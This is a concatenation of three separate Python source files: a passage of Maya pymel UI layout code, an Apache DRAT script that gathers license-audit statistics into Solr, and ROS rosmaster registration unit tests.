value=pm.optionVar.get(intField, 2),
changeCommand=lambda *args: intEntered(intField, args[0]))
# spacer
pm.text(label="", parent=cLayout)
if positionMenu or messageMenu:
# make a rowColumn layout to put our label and option box in nicely
pm.setParent(cLayout)
pm.rowColumnLayout(numberOfColumns=2, columnOffset=(2, "right", 20))
pm.text(label="inView message")
self.cBox()._optionCheckBox_single(variable=variable + "_msg",
name=variable + "_msg",
defaultValue=True)
if positionMenu:
pm.text(label=positionLabel)
positionWidget().create(name=positionMenu)
if top_control:
pm.formLayout(
top_form,
edit=True,
attachControl=[self.main_layout, 'top', 0, top_control],
attachForm=[[self.main_layout, 'left', 8],
[self.main_layout, 'right', 8]]
)
elif top_form:
pm.formLayout(
top_form,
edit=True,
attachForm=[[self.main_layout, 'top', 24],
[self.main_layout, 'left', 8],
[self.main_layout, 'right', 8]]
)
return self.main_layout
class FormAttach():
@staticmethod
def attach(attach_form, form):
af = [[attach_form, 'top', 16],
[attach_form, 'left', 12],
[attach_form, 'right', 12],
[attach_form, 'bottom', 12]
]
pm.formLayout(
form,
edit=True,
attachForm=af
)
@staticmethod
def fill_right(attach_form, form):
af = [[attach_form, 'right', 12]]
pm.formLayout(
form,
edit=True,
attachForm=af
)
@staticmethod
def fill_left(attach_form, form):
af = [[attach_form, 'left', 12]]
pm.formLayout(
form,
edit=True,
attachForm=af
)
@staticmethod
def stretch_down(attach_form, form):
af = [[form, 'bottom', 12]]
pm.formLayout(
attach_form,
edit=True,
attachForm=af
)
@staticmethod
def pin_under(attach_form, form_a, form_b):
af = [[form_a, 'top', 12, form_b]]
pm.formLayout(
attach_form,
edit=True,
attachControl=af
)
|
|
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This script collects statistics from DRAT run on multiple repositories.
# Please see help() method to understand the usage
# author: karanjeets
import sys
import os
import subprocess
import time
import shutil
import datetime
import csv
import urllib2
import json
import xmlrpclib
import getopt
# Check for environment variables
def check_env_var():
if os.getenv("DRAT_HOME") == None:
print "Environment variable $DRAT_HOME is not set."
sys.exit(1)
if os.getenv("JAVA_HOME") == None:
print "Environment variable $JAVA_HOME is not set."
sys.exit(1)
if os.getenv("OPSUI_URL") == None:
print "Environment variable $OPSUI_URL is not set."
sys.exit(1)
if os.getenv("SOLR_URL") == None:
print "Environment variable $SOLR_URL is not set."
sys.exit(1)
if os.getenv("WORKFLOW_URL") == None:
print "Environment variable $WORKFLOW_URL is not set."
sys.exit(1)
# Returns Current Date Time
def current_datetime():
dt = datetime.datetime.now()
return dt.strftime("%Y-%m-%dT%H:%M:%SZ")
# Returns a normalized path.
# Removes the first "/" character and replaces remaining "/" with "_"
def normalize_path(repository):
tmp = repository[repository.index("/") + 1:]
tmp = tmp.replace("/", "_")
tmp = tmp + "_" + current_datetime()
return tmp
# Count the number of files in a directory recursively
# Leverages a basic utility to exclude some files as well
def count_num_files(path, exclude):
count = 0
for root, dirs, files in os.walk(path):
for filename in files:
if exclude not in os.path.join(root, filename):
count += 1
return count
# Prints usage of this script
def help():
print >>sys.stderr, "\n\nUsage: python dratstats.py <path to list of repository URLs> <path to output directory>\n"
# Printing out on Console
def printnow(string):
print string
sys.stdout.flush()
# Parsing RAT log files
def parseFile(filepath):
f = open(filepath, 'r')
lines = f.readlines()
notes = 0
binaries = 0
archives = 0
standards = 0
apachelicensed = 0
generated = 0
unknown = 0
for line in lines:
if line.startswith('Notes:'):
notes = notes + int(line.split(':')[1].strip())
if line.startswith('Binaries:'):
binaries = binaries + int(line.split(':')[1].strip())
if line.startswith('Archives:'):
archives = archives + int(line.split(':')[1].strip())
if line.startswith('Standards:'):
standards = standards + int(line.split(':')[1].strip())
if line.startswith('Apache Licensed:'):
apachelicensed = apachelicensed + int(line.split(':')[1].strip())
if line.startswith('Generated:'):
generated = generated + int(line.split(':')[1].strip())
if line.find('Unknown Licenses') != -1:
unknown = unknown + int(line.split(' ')[0].strip())
return (notes, binaries,archives,standards,apachelicensed,generated,unknown)
return (-1,-1,-1,-1,-1,-1,-1)
# OODT Process (start, stop)
def oodt_process(command):
try:
retcode = subprocess.call("${DRAT_HOME}/bin/oodt" + " " + command, shell=True)
if retcode < 0:
print >>sys.stderr, "ODDT process was terminated by signal", -retcode, ". OODT failed to " + command + ". Aborting..."
sys.exit(1)
elif retcode > 0:
print >>sys.stderr, "OODT process returned", retcode, ". OODT failed to " + command + ". Aborting..."
sys.exit(1)
except OSError as e:
print >>sys.stderr, "OODT execution failed:", e, ". OODT failed to " + command + ". Aborting..."
sys.exit(1)
# DRAT process (crawl, index, map, reduce)
def drat_process(command, repository):
retval = True
try:
retcode = 0
if command == "crawl" or command == "index":
retcode = subprocess.call("${DRAT_HOME}/bin/drat" + " " + command + " " + repository, shell=True)
elif command == "map" or command == "reduce":
retcode = subprocess.call("nohup ${DRAT_HOME}/bin/drat" + " " + command + " &", shell=True)
if retcode < 0:
print >>sys.stderr, "DRAT " + command + " process was terminated by signal", -retcode, ". Aborting..."
retval = False
elif retcode > 0:
print >>sys.stderr, "DRAT " + command + " process returned", retcode, ". Aborting..."
retval = False
except OSError as e:
print >>sys.stderr, "DRAT " + command + " execution failed:", e, ". Aborting..."
retval = False
return retval
# Reset DRAT
def drat_reset():
printnow ("Removing " + os.getenv("DRAT_HOME") + "/data/workflow")
shutil.rmtree(os.getenv("DRAT_HOME") + "/data/workflow")
printnow ("Removing " + os.getenv("DRAT_HOME") + "/filemgr/catalog")
shutil.rmtree(os.getenv("DRAT_HOME") + "/filemgr/catalog")
printnow ("Removing " + os.getenv("DRAT_HOME") + "/solr/drat/data")
shutil.rmtree(os.getenv("DRAT_HOME") + "/solr/drat/data")
printnow ("Removing " + os.getenv("DRAT_HOME") + "/data/archive")
shutil.rmtree(os.getenv("DRAT_HOME") + "/data/archive")
os.mkdir(os.getenv("DRAT_HOME") + "/data/archive")
printnow ("Removing " + os.getenv("DRAT_HOME") + "/data/jobs")
shutil.rmtree(os.getenv("DRAT_HOME") + "/data/jobs")
os.mkdir(os.getenv("DRAT_HOME") + "/data/jobs")
# Check if there are any pending PGE jobs in the queue
def job_in_queue(job_name):
status = "PGE EXEC"
server = xmlrpclib.ServerProxy(os.getenv("WORKFLOW_URL"), verbose=False)
response = server.workflowmgr.getWorkflowInstancesByStatus(status)
for i in range(0, len(response)):
#print response[i]["sharedContext"]["TaskId"]
if response[i]["sharedContext"]["TaskId"][0] == job_name:
return True
return False
# Wait for job to complete
def wait_for_job(job_name):
while job_in_queue(job_name):
for i in range(1, 11):
sys.stdout.write('.')
sys.stdout.flush()
time.sleep(2)
# Run DRAT and collect statistics
def run(repos_list, output_dir):
with open(repos_list) as repositories:
for repository in repositories:
repository = repository.strip()
printnow ("\nVerifying repository path...\n")
if not os.path.exists(repository):
printnow ("\nPath " + repository + "is not valid. Skipping and moving on...\n")
continue
printnow ("\nRepository Path: OK\n")
printnow ("\nStarting OODT...\n")
oodt_process("start")
time.sleep(20)
printnow ("\nOODT Started: OK\n")
printnow ("\nRunning DRAT on " + repository + " ...\n")
retval = True
stats = {}
stats['id'] = repository
stats['crawl_start'] = current_datetime()
retval = drat_process("crawl", repository)
stats['crawl_end'] = current_datetime()
if retval:
time.sleep(5)
stats['index_start'] = current_datetime()
retval = drat_process("index", repository)
stats['index_end'] = current_datetime()
if retval:
time.sleep(5)
stats['map_start'] = current_datetime()
retval = drat_process("map", None)
time.sleep(10)
wait_for_job("urn:drat:MimePartitioner")
wait_for_job("urn:drat:RatCodeAudit")
stats['map_end'] = current_datetime()
if retval:
time.sleep(5)
stats['reduce_start'] = current_datetime()
# Extract data from RatAggregate File
totalNotes = 0
totalBinaries = 0
totalArchives = 0
totalStandards = 0
totalApache = 0
totalGenerated = 0
totalUnknown = 0
rat_dir = os.getenv("DRAT_HOME") + "/data/archive/rat"
# Iterate over all RAT log files
for root, dirs, files in os.walk(rat_dir):
for filename in files:
if filename.endswith(".log"):
(notes, binaries, archives,standards,apachelicensed,generated,unknown) = parseFile(os.path.join(root, filename))
totalNotes = totalNotes + notes
totalBinaries = totalBinaries + binaries
totalArchives = totalArchives + archives
totalStandards = totalStandards + standards
totalApache = totalApache + apachelicensed
totalGenerated = totalGenerated + generated
totalUnknown = totalUnknown + unknown
stats["license_Notes"] = totalNotes
stats["license_Binaries"] = totalBinaries
stats["license_Archives"] = totalArchives
stats["license_Standards"] = totalStandards
stats["license_Apache"] = totalApache
stats["license_Generated"] = totalGenerated
stats["license_Unknown"] = totalUnknown
stats['reduce_end'] = current_datetime()
print "\nDRAT Scan Completed: OK\n"
time.sleep(5)
if retval:
# Copy Data with datetime variables above, extract output from RatAggregate file, extract data from Solr Core
printnow ("\nCopying data to Solr and Output Directory...\n")
# Extract data from Solr
neg_mimetype = ["image", "application", "text", "video", "audio", "message", "multipart"]
connection = urllib2.urlopen(os.getenv("SOLR_URL") + "/drat/select?q=*%3A*&rows=0&facet=true&facet.field=mimetype&wt=python&indent=true")
response = eval(connection.read())
mime_count = response["facet_counts"]["facet_fields"]["mimetype"]
for i in range(0, len(mime_count), 2):
if mime_count[i].split("/")[0] not in neg_mimetype:
stats["mime_" + mime_count[i]] = mime_count[i + 1]
# Count the number of files
stats["files"] = count_num_files(repository, ".svn")
# Write data into Solr
stats_data = []
stats_data.append(stats)
json_data = json.dumps(stats_data)
printnow (json_data)
request = urllib2.Request(os.getenv("SOLR_URL") + "/statistics/update/json?commit=true")
request.add_header('Content-type', 'application/json')
urllib2.urlopen(request, json_data)
# Copying data to Output Directory
repos_out = output_dir + "/" + normalize_path(repository)
shutil.copytree(os.getenv("DRAT_HOME") + "/data", repos_out)
printnow ("\nData copied to Solr and Output Directory: OK\n")
else:
printnow ("\nDRAT Scan Completed: Resulted in Error\n")
time.sleep(5)
printnow ("\nStopping OODT...\n")
oodt_process("stop")
time.sleep(20)
printnow ("\nOODT Stopped: OK\n")
printnow ("\nReseting DRAT...\n")
drat_reset()
time.sleep(5)
printnow ("\nDRAT Reset: OK\n")
printnow ("\nDRAT SCAN COMPLETED!!!\n")
# This is where it all begins
def main():
if len(sys.argv) < 2 or len(sys.argv) > 3:
print >>sys.stderr, "\nIncorrect number of arguments passed. Aborting..."
help()
sys.exit(1)
repos_list = sys.argv[1]
output_dir = sys.argv[2]
if not os.path.isfile(repos_list):
print >>sys.stderr, "\nRepository list doesn't exists at the path: ", repos_list
help()
sys.exit(1)
if not os.path.isdir(output_dir):
print >>sys.stderr, "\nOutput Directory doesn't exist at the path: ", output_dir
help()
sys.exit(1)
check_env_var()
run(repos_list, output_dir)
if __name__ == "__main__":
main()
|
|
# Software License Agreement (BSD License)
#
# Copyright (c) 2008, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import os
import sys
import unittest
import time
# mock of subscription tests
class ThreadPoolMock(object):
def queue_task(*args): pass
class TestRosmasterRegistrations(unittest.TestCase):
def test_NodeRef_services(self):
from rosmaster.registrations import NodeRef, Registrations
n = NodeRef('n1', 'http://localhost:1234')
# test services
n.add(Registrations.SERVICE, 'add_two_ints')
self.failIf(n.is_empty())
self.assert_('add_two_ints' in n.services)
self.assertEquals(['add_two_ints'], n.services)
n.add(Registrations.SERVICE, 'add_three_ints')
self.failIf(n.is_empty())
self.assert_('add_three_ints' in n.services)
self.assert_('add_two_ints' in n.services)
n.remove(Registrations.SERVICE, 'add_two_ints')
self.assert_('add_three_ints' in n.services)
self.assertEquals(['add_three_ints'], n.services)
self.failIf('add_two_ints' in n.services)
self.failIf(n.is_empty())
n.remove(Registrations.SERVICE, 'add_three_ints')
self.failIf('add_three_ints' in n.services)
self.failIf('add_two_ints' in n.services)
self.assertEquals([], n.services)
self.assert_(n.is_empty())
def test_NodeRef_subs(self):
from rosmaster.registrations import NodeRef, Registrations
n = NodeRef('n1', 'http://localhost:1234')
# test topic suscriptions
n.add(Registrations.TOPIC_SUBSCRIPTIONS, 'topic1')
self.failIf(n.is_empty())
self.assert_('topic1' in n.topic_subscriptions)
self.assertEquals(['topic1'], n.topic_subscriptions)
n.add(Registrations.TOPIC_SUBSCRIPTIONS, 'topic2')
self.failIf(n.is_empty())
self.assert_('topic2' in n.topic_subscriptions)
self.assert_('topic1' in n.topic_subscriptions)
n.remove(Registrations.TOPIC_SUBSCRIPTIONS, 'topic1')
self.assert_('topic2' in n.topic_subscriptions)
self.assertEquals(['topic2'], n.topic_subscriptions)
self.failIf('topic1' in n.topic_subscriptions)
self.failIf(n.is_empty())
n.remove(Registrations.TOPIC_SUBSCRIPTIONS, 'topic2')
self.failIf('topic2' in n.topic_subscriptions)
self.failIf('topic1' in n.topic_subscriptions)
self.assertEquals([], n.topic_subscriptions)
self.assert_(n.is_empty())
def test_NodeRef_pubs(self):
from rosmaster.registrations import NodeRef, Registrations
n = NodeRef('n1', 'http://localhost:1234')
# test topic publications
n.add(Registrations.TOPIC_PUBLICATIONS, 'topic1')
self.failIf(n.is_empty())
self.assert_('topic1' in n.topic_publications)
self.assertEquals(['topic1'], n.topic_publications)
n.add(Registrations.TOPIC_PUBLICATIONS, 'topic2')
self.failIf(n.is_empty())
self.assert_('topic2' in n.topic_publications)
self.assert_('topic1' in n.topic_publications)
n.remove(Registrations.TOPIC_PUBLICATIONS, 'topic1')
self.assert_('topic2' in n.topic_publications)
self.assertEquals(['topic2'], n.topic_publications)
self.failIf('topic1' in n.topic_publications)
self.failIf(n.is_empty())
n.remove(Registrations.TOPIC_PUBLICATIONS, 'topic2')
self.failIf('topic2' in n.topic_publications)
self.failIf('topic1' in n.topic_publications)
self.assertEquals([], n.topic_publications)
self.assert_(n.is_empty())
def test_NodeRef_base(self):
import rosmaster.exceptions
from rosmaster.registrations import NodeRef, Registrations
n = NodeRef('n1', 'http://localhost:1234')
self.assertEquals('http://localhost:1234', n.api)
self.assertEquals([], n.param_subscriptions)
self.assertEquals([], n.topic_subscriptions)
self.assertEquals([], n.topic_publications)
self.assertEquals([], n.services)
self.assert_(n.is_empty())
try:
n.add(12345, 'topic')
self.fail("should have failed with invalid type")
except rosmaster.exceptions.InternalException: pass
try:
n.remove(12345, 'topic')
self.fail("should have failed with invalid type")
except rosmaster.exceptions.InternalException: pass
n.add(Registrations.TOPIC_PUBLICATIONS, 'topic1')
n.add(Registrations.TOPIC_PUBLICATIONS, 'topic2')
n.add(Registrations.TOPIC_SUBSCRIPTIONS, 'topic2')
n.add(Registrations.TOPIC_SUBSCRIPTIONS, 'topic3')
n.add(Registrations.PARAM_SUBSCRIPTIONS, 'topic4')
n.add(Registrations.SERVICE, 'serv')
self.failIf(n.is_empty())
n.clear()
self.assert_(n.is_empty())
def test_NodeRef_param_subs(self):
from rosmaster.registrations import NodeRef, Registrations
n = NodeRef('n1', 'http://localhost:1234')
# test param suscriptions
n.add(Registrations.PARAM_SUBSCRIPTIONS, 'param1')
self.failIf(n.is_empty())
self.assert_('param1' in n.param_subscriptions)
self.assertEquals(['param1'], n.param_subscriptions)
n.add(Registrations.PARAM_SUBSCRIPTIONS, 'param2')
self.failIf(n.is_empty())
self.assert_('param2' in n.param_subscriptions)
self.assert_('param1' in n.param_subscriptions)
n.remove(Registrations.PARAM_SUBSCRIPTIONS, 'param1')
self.assert_('param2' in n.param_subscriptions)
self.assertEquals(['param2'], n.param_subscriptions)
self.failIf('param1' in n.param_subscriptions)
self.failIf(n.is_empty())
n.remove(Registrations.PARAM_SUBSCRIPTIONS, 'param2')
self.failIf('param2' in n.param_subscriptions)
self.failIf('param1' in n.param_subscriptions)
self.assertEquals([], n.param_subscriptions)
self.assert_(n.is_empty())
## subroutine of registration tests that test topic/param type Reg objects
## @param r Registrations: initialized registrations object to test
def _subtest_Registrations_basic(self, r):
#NOTE: no real difference between topic and param names, so tests are reusable
# - note that we've updated node1's API
r.register('topic1', 'node1', 'http://node1:5678')
self.assert_('topic1' in r) # test contains
self.assert_(r.has_key('topic1')) # test contains
self.assertEquals(['topic1'], [k for k in r.iterkeys()])
self.assertEquals(['http://node1:5678'], r.get_apis('topic1'))
self.assertEquals([('node1', 'http://node1:5678')], r['topic1'])
self.failIf(not r) #test nonzero
self.assertEquals(None, r.get_service_api('topic1')) #make sure no contamination
self.assertEquals([['topic1', ['node1']]], r.get_state())
r.register('topic1', 'node2', 'http://node2:5678')
self.assertEquals(['topic1'], [k for k in r.iterkeys()])
self.assertEquals(['topic1'], [k for k in r.iterkeys()])
self.assertEquals(2, len(r.get_apis('topic1')))
self.assert_('http://node1:5678' in r.get_apis('topic1'))
self.assert_('http://node2:5678' in r.get_apis('topic1'))
self.assertEquals(2, len(r['topic1']))
self.assert_(('node1', 'http://node1:5678') in r['topic1'], r['topic1'])
self.assert_(('node2', 'http://node2:5678') in r['topic1'])
self.assertEquals([['topic1', ['node1', 'node2']]], r.get_state())
# TODO: register second topic
r.register('topic2', 'node3', 'http://node3:5678')
self.assert_('topic2' in r) # test contains
self.assert_(r.has_key('topic2')) # test contains
self.assert_('topic1' in [k for k in r.iterkeys()])
self.assert_('topic2' in [k for k in r.iterkeys()])
self.assertEquals(['http://node3:5678'], r.get_apis('topic2'))
self.assertEquals([('node3', 'http://node3:5678')], r['topic2'])
self.failIf(not r) #test nonzero
self.assert_(['topic1', ['node1', 'node2']] in r.get_state(), r.get_state())
self.assert_(['topic2', ['node3']] in r.get_state(), r.get_state())
# Unregister
# - fail if node is not registered
code, _, val = r.unregister('topic1', 'node3', 'http://node3:5678')
self.assertEquals(0, val)
# - fail if topic is not registered by that node
code, _, val = r.unregister('topic2', 'node2', 'http://node2:5678')
self.assertEquals(0, val)
# - fail if URI does not match
code, _, val = r.unregister('topic2', 'node2', 'http://fakenode2:5678')
self.assertEquals(0, val)
# - unregister node2
code, _, val = r.unregister('topic1', 'node1', 'http://node1:5678')
self.assertEquals(1, code)
self.assertEquals(1, val)
self.assert_('topic1' in r) # test contains
self.assert_(r.has_key('topic1'))
self.assert_('topic1' in [k for k in r.iterkeys()])
self.assert_('topic2' in [k for k in r.iterkeys()])
self.assertEquals(['http://node2:5678'], r.get_apis('topic1'))
self.assertEquals([('node2', 'http://node2:5678')], r['topic1'])
self.failIf(not r) #test nonzero
self.assert_(['topic1', ['node2']] in r.get_state())
self.assert_(['topic2', ['node3']] in r.get_state())
code, _, val = r.unregister('topic1', 'node2', 'http://node2:5678')
self.assertEquals(1, code)
self.assertEquals(1, val)
self.failIf('topic1' in r) # test contains
self.failIf(r.has_key('topic1'))
self.assertEquals(['topic2'], [k for k in r.iterkeys()])
self.assertEquals([], r.get_apis('topic1'))
self.assertEquals([], r['topic1'])
self.failIf(not r) #test nonzero
self.assertEquals([['topic2', ['node3']]], r.get_state())
# clear out last reg
code, _, val = r.unregister('topic2', 'node3', 'http://node3:5678')
self.assertEquals(1, code)
self.assertEquals(1, val)
self.failIf('topic2' in r) # test contains
self.assert_(not r)
self.assertEquals([], r.get_state())
def test_Registrations(self):
import rosmaster.exceptions
from rosmaster.registrations import Registrations
types = [Registrations.TOPIC_SUBSCRIPTIONS,
Registrations.TOPIC_PUBLICATIONS,
Registrations.SERVICE,
Registrations.PARAM_SUBSCRIPTIONS]
# test enums
self.assertEquals(4, len(set(types)))
try:
r = Registrations(-1)
self.fail("Registrations accepted invalid type")
except rosmaster.exceptions.InternalException: pass
for t in types:
r = Registrations(t)
self.assertEquals(t, r.type)
self.assert_(not r) #test nonzero
self.failIf('topic1' in r) #test contains
self.failIf(r.has_key('topic1')) #test has_key
self.failIf([k for k in r.iterkeys()]) #no keys
self.assertEquals(None, r.get_service_api('non-existent'))
# Test topic subs
r = Registrations(Registrations.TOPIC_SUBSCRIPTIONS)
self._subtest_Registrations_basic(r)
r = Registrations(Registrations.TOPIC_PUBLICATIONS)
self._subtest_Registrations_basic(r)
r = Registrations(Registrations.PARAM_SUBSCRIPTIONS)
self._subtest_Registrations_basic(r)
r = Registrations(Registrations.SERVICE)
self._subtest_Registrations_services(r)
def test_RegistrationManager_services(self):
from rosmaster.registrations import Registrations, RegistrationManager
rm = RegistrationManager(ThreadPoolMock())
self.assertEquals(None, rm.get_node('caller1'))
# do an unregister first, before service_api is initialized
code, msg, val = rm.unregister_service('s1', 'caller1', 'rosrpc://one:1234')
self.assertEquals(1, code)
self.assertEquals(0, val)
rm.register_service('s1', 'caller1', 'http://one:1234', 'rosrpc://one:1234')
self.assert_(rm.services.has_key('s1'))
self.assertEquals('rosrpc://one:1234', rm.services.get_service_api('s1'))
self.assertEquals('http://one:1234', rm.get_node('caller1').api)
self.assertEquals([['s1', ['caller1']]], rm.services.get_state())
# - verify that changed caller_api updates ref
rm.register_service('s1', 'caller1', 'http://oneB:1234', 'rosrpc://one:1234')
self.assert_(rm.services.has_key('s1'))
self.assertEquals('rosrpc://one:1234', rm.services.get_service_api('s1'))
self.assertEquals('http://oneB:1234', rm.get_node('caller1').api)
self.assertEquals([['s1', ['caller1']]], rm.services.get_state())
# - verify that changed service_api updates ref
rm.register_service('s1', 'caller1', 'http://oneB:1234', 'rosrpc://oneB:1234')
self.assert_(rm.services.has_key('s1'))
self.assertEquals('rosrpc://oneB:1234', rm.services.get_service_api('s1'))
self.assertEquals('http://oneB:1234', rm.get_node('caller1').api)
self.assertEquals([['s1', ['caller1']]], rm.services.get_state())
rm.register_service('s2', 'caller2', 'http://two:1234', 'rosrpc://two:1234')
self.assertEquals('http://two:1234', rm.get_node('caller2').api)
# - unregister should be noop if service api does not match
code, msg, val = rm.unregister_service('s2', 'caller2', 'rosrpc://b:1234')
self.assertEquals(1, code)
self.assertEquals(0, val)
self.assert_(rm.services.has_key('s2'))
self.assertEquals('http://two:1234', rm.get_node('caller2').api)
self.assertEquals('rosrpc://two:1234', rm.services.get_service_api('s2'))
# - unregister should be noop if service is unknown
code, msg, val = rm.unregister_service('unknown', 'caller2', 'rosrpc://two:1234')
self.assertEquals(1, code)
self.assertEquals(0, val)
self.assert_(rm.services.has_key('s2'))
self.assertEquals('http://two:1234', rm.get_node('caller2').api)
self.assertEquals('rosrpc://two:1234', rm.services.get_service_api('s2'))
# - unregister should clear all knowledge of caller2
code,msg, val = rm.unregister_service('s2', 'caller2', 'rosrpc://two:1234')
self.assertEquals(1, code)
self.assertEquals(1, val)
self.assert_(rm.services.has_key('s1'))
self.failIf(rm.services.has_key('s2'))
self.assertEquals(None, rm.get_node('caller2'))
code, msg, val = rm.unregister_service('s1', 'caller1', 'rosrpc://oneB:1234')
self.assertEquals(1, code)
self.assertEquals(1, val)
self.assert_(not rm.services.__nonzero__())
self.failIf(rm.services.has_key('s1'))
self.assertEquals(None, rm.get_node('caller1'))
def test_RegistrationManager_topic_pub(self):
from rosmaster.registrations import Registrations, RegistrationManager
rm = RegistrationManager(ThreadPoolMock())
self.subtest_RegistrationManager(rm, rm.publishers, rm.register_publisher, rm.unregister_publisher)
def test_RegistrationManager_topic_sub(self):
from rosmaster.registrations import Registrations, RegistrationManager
rm = RegistrationManager(ThreadPoolMock())
self.subtest_RegistrationManager(rm, rm.subscribers, rm.register_subscriber, rm.unregister_subscriber)
def test_RegistrationManager_param_sub(self):
from rosmaster.registrations import Registrations, RegistrationManager
rm = RegistrationManager(ThreadPoolMock())
self.subtest_RegistrationManager(rm, rm.param_subscribers, rm.register_param_subscriber, rm.unregister_param_subscriber)
def subtest_RegistrationManager(self, rm, r, register, unregister):
self.assertEquals(None, rm.get_node('caller1'))
register('key1', 'caller1', 'http://one:1234')
self.assert_(r.has_key('key1'))
self.assertEquals('http://one:1234', rm.get_node('caller1').api)
self.assertEquals([['key1', ['caller1']]], r.get_state())
# - verify that changed caller_api updates ref
register('key1', 'caller1', 'http://oneB:1234')
self.assert_(r.has_key('key1'))
self.assertEquals('http://oneB:1234', rm.get_node('caller1').api)
self.assertEquals([['key1', ['caller1']]], r.get_state())
register('key2', 'caller2', 'http://two:1234')
self.assertEquals('http://two:1234', rm.get_node('caller2').api)
# - unregister should be noop if caller api does not match
code, msg, val = unregister('key2', 'caller2', 'http://b:1234')
self.assertEquals(1, code)
self.assertEquals(0, val)
self.assertEquals('http://two:1234', rm.get_node('caller2').api)
# - unregister should be noop if key is unknown
code, msg, val = unregister('unknown', 'caller2', 'http://two:1234')
self.assertEquals(1, code)
self.assertEquals(0, val)
self.assert_(r.has_key('key2'))
self.assertEquals('http://two:1234', rm.get_node('caller2').api)
# - unregister should be noop if unknown node
code, msg, val = rm.unregister_publisher('key2', 'unknown', 'http://unknown:1')
self.assertEquals(1, code)
self.assertEquals(0, val)
self.assert_(r.has_key('key2'))
# - unregister should clear all knowledge of caller2
code,msg, val = unregister('key2', 'caller2', 'http://two:1234')
self.assertEquals(1, code)
self.assertEquals(1, val)
self.assert_(r.has_key('key1'))
self.failIf(r.has_key('key2'))
self.assertEquals(None, rm.get_node('caller2'))
code, msg, val = unregister('key1', 'caller1', 'http://oneB:1234')
self.assertEquals(1, code)
self.assertEquals(1, val)
self.assert_(not r.__nonzero__())
self.failIf(r.has_key('key1'))
self.assertEquals(None, rm.get_node('caller1'))
def test_RegistrationManager_base(self):
import rosmaster.exceptions
from rosmaster.registrations import Registrations, RegistrationManager
threadpool = ThreadPoolMock()
rm = RegistrationManager(threadpool)
self.assert_(isinstance(rm.services, Registrations))
self.assertEquals(Registrations.SERVICE, rm.services.type)
self.assert_(isinstance(rm.param_subscribers, Registrations))
self.assertEquals(Registrations.PARAM_SUBSCRIPTIONS, rm.param_subscribers.type)
self.assert_(isinstance(rm.subscribers, Registrations))
self.assertEquals(Registrations.TOPIC_SUBSCRIPTIONS, rm.subscribers.type)
self.assert_(isinstance(rm.subscribers, Registrations))
self.assertEquals(Registrations.TOPIC_PUBLICATIONS, rm.publishers.type)
self.assert_(isinstance(rm.publishers, Registrations))
#test auto-clearing of registrations if node API changes
rm.register_publisher('pub1', 'caller1', 'http://one:1')
rm.register_publisher('pub1', 'caller2', 'http://two:1')
rm.register_publisher('pub1', 'caller3', 'http://three:1')
rm.register_subscriber('sub1', 'caller1', 'http://one:1')
rm.register_subscriber('sub1', 'caller2', 'http://two:1')
rm.register_subscriber('sub1', 'caller3', 'http://three:1')
rm.register_param_subscriber('p1', 'caller1', 'http://one:1')
rm.register_param_subscriber('p1', 'caller2', 'http://two:1')
rm.register_param_subscriber('p1', 'caller3', 'http://three:1')
rm.register_service('s1', 'caller1', 'http://one:1', 'rosrpc://one:1')
self.assertEquals('http://one:1', rm.get_node('caller1').api)
self.assertEquals('http://two:1', rm.get_node('caller2').api)
self.assertEquals('http://three:1', rm.get_node('caller3').api)
# - first, make sure that changing rosrpc URI does not erase state
rm.register_service('s1', 'caller1', 'http://one:1', 'rosrpc://oneB:1')
n = rm.get_node('caller1')
self.assertEquals(['pub1'], n.topic_publications)
self.assertEquals(['sub1'], n.topic_subscriptions)
self.assertEquals(['p1'], n.param_subscriptions)
self.assertEquals(['s1'], n.services)
self.assert_('http://one:1' in rm.publishers.get_apis('pub1'))
self.assert_('http://one:1' in rm.subscribers.get_apis('sub1'))
self.assert_('http://one:1' in rm.param_subscribers.get_apis('p1'))
self.assert_('http://one:1' in rm.services.get_apis('s1'))
# - also, make sure unregister does not erase state if API changed
rm.unregister_publisher('pub1', 'caller1', 'http://not:1')
self.assert_('http://one:1' in rm.publishers.get_apis('pub1'))
rm.unregister_subscriber('sub1', 'caller1', 'http://not:1')
self.assert_('http://one:1' in rm.subscribers.get_apis('sub1'))
rm.unregister_param_subscriber('p1', 'caller1', 'http://not:1')
self.assert_('http://one:1' in rm.param_subscribers.get_apis('p1'))
rm.unregister_service('sub1', 'caller1', 'rosrpc://not:1')
self.assert_('http://one:1' in rm.services.get_apis('s1'))
# erase caller1 sub/srvs/params via register_publisher
rm.register_publisher('pub1', 'caller1', 'http://newone:1')
self.assertEquals('http://newone:1', rm.get_node('caller1').api)
# - check node ref
n = rm.get_node('caller1')
self.assertEquals(['pub1'], n.topic_publications)
